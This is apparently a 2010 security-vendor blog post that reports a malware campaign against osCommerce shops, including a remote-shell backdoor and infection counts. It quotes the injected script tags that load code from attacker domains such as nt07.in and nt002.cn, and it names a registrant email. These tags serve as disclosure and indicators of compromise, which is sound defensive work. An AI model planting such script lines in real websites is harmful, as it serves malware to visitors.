Sucuri Blog

Website Security News

osCommerce attacks and nt07.in, nt06.in, etc

We posted yesterday about a series of attacks against osCommerce sites using some russian domains to push the malware (generally the fake AV). We also posted details on how to fix and secure osCommerce to protect against those:

https://blog.sucuri.net/2010/11/continuing-attacks-against-oscommerce-sites.html

However, they are not the only ones targeting osCommerce. There is another group using many .in web sites (always registered by Jennifer Hook – veriandjsad@comcast.net) that are infecting thousands of sites too.

When they detect an vulnerable site (see previous post by details on that), they drop a backdoor, generally named google*.php that will allow them to manage the site remotely. You can see the full backdoor here (caught by our honeypots):

http://sucuri.net/?page=tools&title=blacklist&detail=1205dd32a1004a65ecc4d4441474217d

It is interesting that in addition to give full shell access to the attackers, it also uses http://redserver.com.ua/code.txt to read the list of domains to use in the attack. Currently, these are the ones being used:

<script src="http://nt07.in/3`></script>
<script src="http://nt07.in/3`></script>
<script src="http://nt06.in/3`></script>
<script src="http://nt06.in/3`></script>
<script src="http://nt04.in/3`></script>
<script src="http://nt04.in/3`></script>
<script src="http://nt02.co.in/3`></script>
<script src="http://nt02.co.in/3`></script>
<script src="http://nt002.cn/E/J.JS`></script>
<script src="http://nt002.cn/E/J.JS`></script>

You can get more details about this attack here: http://sucuri.net/malware/entry/MW:OSCOM:1. and if you are using osCommerce, make sure to upgrade and secure it as soon as possible.

How many sites got hacked? According to Google, just nt04.in (91.213.8.192) infected almost 3 thousand sites:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 2890 domain(s), including folhadenoticias.com.br/, leskeupines.com/, todafruta.com.br/.

So the number is probably a lot bigger if we get all the domains used in the attacks and count the sites that didn’t get blacklisted yet.

Site hacked? Blacklisted? Sign up with us and we will get it fixed right away: http://sucuri.net

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions